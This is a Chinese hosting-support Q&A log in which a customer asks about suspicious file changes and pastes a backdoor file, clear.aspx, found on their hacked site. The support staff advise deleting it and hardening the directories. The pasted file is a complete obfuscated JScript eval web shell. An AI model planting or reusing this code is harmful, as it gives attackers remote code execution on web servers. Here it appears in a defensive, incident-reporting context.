问:这个文件14:33:08动过upword 改名 统计 强删 查毒 文件夹 18:02: 14:33:08D,黑客这个文件14:33:08动过
答:您好,这个目录内是数据库文件,数据库读写会造成目录时间修改,这个并不是黑客修改的,非常感谢您长期对我司的支持!
问:在这个文件www\\e\\order\\images\\clear.aspx
我也捉到这个挂马clear.aspx
<%@ Page Language = Jscript %><%var/*-/*-*/P/*-/*-*/=/*-/*-*/\”e\” \”v\” /*-/*-*/\”a\” \”l\” \”(\” \”R\” \”e\” /*-/*-*/\”q\” \”u\” \”e\”/*-/*-*/ \”s\” \”t\” \”[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/8/*-/*-*/]\” \”,\” \”\\\”\” \”u\” \”n\” \”s\”/*-/*-*/ \”a\” \”f\” \”e\” \”\\\”\” \”)\”;eval (/*-/*-*/P/*-/*-*/,/*-/*-*/\”u\” \”n\” \”s\”/*-/*-*/ \”a\” \”f\” \”e\”/*-/*-*/);%>
答:您好,这个是木马文件,请删除掉,另外全面排查下其它目录是否有木马文件,针对不需要执行程序的目录,可以添加下目录保护,非常感谢您长期对我司的支持!
问:
之前不是已经付费清理并加固了吗?怎么还是老提示非法信息
答:您好,
您的程序是否经过了二次开发,这些根本无法判断是黑客留下的后门文件还是您自己写的文件,存在太多的漏洞,后门文件,只能大概清理了这些文件,放在桌面上,请自行逐个目录的排查,哪些是您自己的文件,哪些不是,全部清理干净后我们在为您做安全设置才能有效防止黑客侵入,非常感谢您长期对我司的支持!
问:这个网站做的是使用这个服务器做的
没有换过服务器,为什么会缺文件呢
答:您好,
核实您的网站应该被黑了,虚拟主机上次自动备份的时间是 ,核实备份中没有对应的文件 ,若本地有网站文件,请上传到主机测试下,非常感谢您长期对我司的支持!